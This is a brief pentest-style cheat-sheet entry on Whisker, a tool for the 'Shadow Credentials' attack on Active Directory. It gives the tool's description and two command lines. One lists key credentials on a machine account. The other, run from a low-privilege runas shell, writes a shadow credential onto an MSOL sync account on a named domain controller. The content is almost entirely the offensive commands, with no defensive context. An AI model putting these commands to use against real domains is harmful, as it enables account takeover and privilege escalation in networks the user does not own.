# whisker.exe

This tool is "for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account."

This video is a great reference for seeing the Shadow Credentials attack carried out with assistance from Whisker.

whisker.exe list /target:SOME-MACHINE$

Spawn a "runas" cmd.exe as the LOWPRIV account, and then:

whisker.exe add /target:MSOL-SYNC-ACCOUNT /domain:domain.com /dc:1.2.3.4